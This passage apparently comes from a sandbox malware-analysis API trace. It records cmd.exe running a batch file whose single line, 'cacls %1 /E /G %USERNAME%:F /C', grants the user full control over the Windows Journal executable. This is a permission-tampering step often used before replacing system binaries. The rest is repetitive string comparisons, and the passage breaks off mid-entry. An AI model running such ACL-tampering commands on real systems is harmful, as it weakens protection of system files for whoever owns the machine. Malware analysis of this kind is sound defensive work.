GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0266.028] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0266.028] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0266.028] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0266.029] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0266.029] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0266.029] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0266.029] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0266.029] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0266.029] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0266.029] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0266.031] GetConsoleTitleW (in: lpConsoleTitle=0xbbf538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.031] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0266.031] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0266.031] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0266.031] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0266.031] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0266.031] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0266.031] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0266.031] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0266.031] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0266.031] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0266.031] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0266.031] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0266.031] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0266.031] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0266.031] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0266.031] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0266.031] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0266.031] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0266.031] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0266.031] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0266.031] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0266.031] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0266.031] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0266.031] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0266.031] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0266.031] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0266.031] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0266.031] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0266.031] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0266.031] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0266.031] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0266.031] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0266.031] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0266.032] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0266.032] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0266.032] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0266.032] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0266.032] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0266.032] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0266.032] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0266.032] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0266.032] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0266.032] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0266.032] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0266.032] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0266.032] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0266.032] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0266.032] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0266.032] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0266.032] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0266.032] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0266.032] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0266.032] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0266.032] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0266.032] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0266.032] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0266.032] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0266.032] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0266.032] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0266.032] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0266.032] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0266.032] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0266.032] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0266.032] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0266.032] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0266.032] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0266.032] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0266.032] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0266.032] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0266.032] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0266.032] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0266.032] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0266.032] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0266.032] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0266.032] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0266.032] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0266.032] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0266.032] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0266.032] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0266.032] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0266.032] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0266.032] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0266.032] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0266.032] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0266.032] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0266.032] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0266.033] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0266.033] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0266.033] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0266.033] SetErrorMode (uMode=0x0) returned 0x0 [0266.033] SetErrorMode (uMode=0x1) returned 0x0 [0266.033] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0xd105d0, lpFilePart=0xbbf044 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbbf044*="Desktop") returned 0x1d [0266.033] SetErrorMode (uMode=0x0) returned 0x1 [0266.033] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0266.034] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.036] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0xbbedf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbedf0) returned 0xd1b0e8 [0266.036] FindClose (in: hFindFile=0xd1b0e8 | out: hFindFile=0xd1b0e8) returned 1 [0266.036] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0266.036] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0266.036] GetConsoleTitleW (in: lpConsoleTitle=0xbbf2c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.036] ApiSetQueryApiSetPresence () returned 0x0 [0266.036] ResolveDelayLoadedAPI () returned 0x745414a0 [0266.038] SaferWorker () returned 0x0 [0266.048] SetErrorMode (uMode=0x0) returned 0x0 [0266.048] SetErrorMode (uMode=0x1) returned 0x0 [0266.048] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0xd1acd8, lpFilePart=0xbbf174 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xbbf174*="vRnqNMBW.bat") returned 0x2a [0266.049] SetErrorMode (uMode=0x0) returned 0x1 [0266.049] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Journal.exe\"", _Control=" \x09") returned 0x1 [0266.049] CmdBatNotificationStub () returned 0x1 [0266.049] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xbbf204, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0266.049] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0266.049] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.049] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.049] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.049] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.049] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xbbf1d4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xbbf1d4*=0xe2, lpOverlapped=0x0) returned 1 [0266.049] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0266.049] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0266.050] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.050] GetFileType (hFile=0xb4) returned 0x1 [0266.050] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.050] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0266.050] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0266.051] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0266.051] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0266.051] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0266.051] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0266.051] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0266.051] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0266.051] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0266.052] _tell (_FileHandle=3) returned 32 [0266.052] _close (_FileHandle=3) returned 0 [0266.052] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbef98 | out: _Buffer="\r\n") returned 2 [0266.052] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.052] GetFileType (hFile=0x3c) returned 0x2 [0266.052] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.053] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef70 | out: lpMode=0xbbef70) returned 1 [0266.053] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.053] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbef88, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbef88*=0x2) returned 1 [0266.053] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0266.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0266.053] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xbbef94 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0266.053] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xbbef94 | out: _Buffer=">") returned 1 [0266.053] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.053] GetFileType (hFile=0x3c) returned 0x2 [0266.053] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.053] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbef74 | out: lpMode=0xbbef74) returned 1 [0266.053] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.053] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xbbef8c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xbbef8c*=0x1e) returned 1 [0266.054] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.054] GetFileType (hFile=0x3c) returned 0x2 [0266.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.054] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf214 | out: lpMode=0xbbf214) returned 1 [0266.054] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.054] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xd17718*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xbbf22c, lpReserved=0x0 | out: lpBuffer=0xd17718*, lpNumberOfCharsWritten=0xbbf22c*=0x5) returned 1 [0266.054] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xbbf234 | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Journal.exe\" /E /G CIiHmnxMn6Ps:F /C ") returned 72 [0266.054] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.054] GetFileType (hFile=0x3c) returned 0x2 [0266.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.054] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf20c | out: lpMode=0xbbf20c) returned 1 [0266.054] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.054] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0xbbf224, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf224*=0x48) returned 1 [0266.054] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xbbf248 | out: _Buffer="\r\n") returned 2 [0266.055] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.055] GetFileType (hFile=0x3c) returned 0x2 [0266.055] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.055] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xbbf220 | out: lpMode=0xbbf220) returned 1 [0266.055] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.055] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xbbf238, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xbbf238*=0x2) returned 1 [0266.055] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0266.055] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0266.055] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0266.055] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0266.055] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0266.055] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0266.055] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0266.055] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0266.055] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0266.055] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0266.055] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0266.055] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0266.055] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0266.055] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0266.055] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0266.055] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0266.055] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0266.055] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0266.055] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0266.055] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0266.055] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0266.055] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0266.055] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0266.056] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0266.056] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0266.056] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0266.056] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0266.056] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0266.056] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0266.056] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0266.056] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0266.056] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0266.056] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0266.056] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0266.056] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0266.056] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0266.056] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0266.056] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0266.056] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0266.056] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0266.056] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0266.056] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0266.056] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0266.056] SetErrorMode (uMode=0x0) returned 0x0 [0266.056] SetErrorMode (uMode=0x1) returned 0x0 [0266.056] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1bec0, lpFilePart=0xbbefe4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbbefe4*="Desktop") returned 0x1d [0266.056] SetErrorMode (uMode=0x0) returned 0x1 [0266.056] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0266.056] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0266.058] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.058] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.058] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xffffffff [0266.058] GetLastError () returned 0x2 [0266.058] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.058] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xffffffff [0266.059] GetLastError () returned 0x2 [0266.059] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.059] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xd1c258 [0266.059] FindClose (in: hFindFile=0xd1c258 | out: hFindFile=0xd1c258) returned 1 [0266.059] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xffffffff [0266.059] GetLastError () returned 0x2 [0266.059] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xbbed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbbed70) returned 0xd1c258 [0266.059] FindClose (in: hFindFile=0xd1c258 | out: hFindFile=0xd1c258) returned 1 [0266.059] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0266.059] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0266.059] GetConsoleTitleW (in: lpConsoleTitle=0xbbedb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.061] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0266.061] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0266.061] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0266.061] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0266.061] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0266.061] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0266.061] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0266.062] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0266.062] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0266.062] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0266.062] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0266.062] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0266.062] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0266.062] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0266.062] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0266.062] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0266.062] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0266.062] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0266.062] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0266.062] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0266.062] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0266.062] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0266.062] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0266.062] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0266.062] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0266.062] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0266.062] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0266.062] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0266.062] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0266.062] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0266.062] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0266.062] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0266.062] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0266.062] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0266.062] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0266.062] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0266.062] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0266.062] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0266.062] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0266.062] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0266.062] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0266.062] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0266.063] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0266.063] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0266.063] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0266.063] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0266.063] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0266.063] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0266.063] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0266.063] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0266.063] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0266.063] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0266.063] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0266.063] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0266.063] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0266.063] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0266.063] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0266.063] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0266.063] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0266.063] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0266.063] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0266.063] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0266.063] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0266.063] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0266.063] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0266.063] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0266.063] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0266.063] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0266.063] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0266.063] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0266.063] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0266.063] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0266.063] _wcsicmp 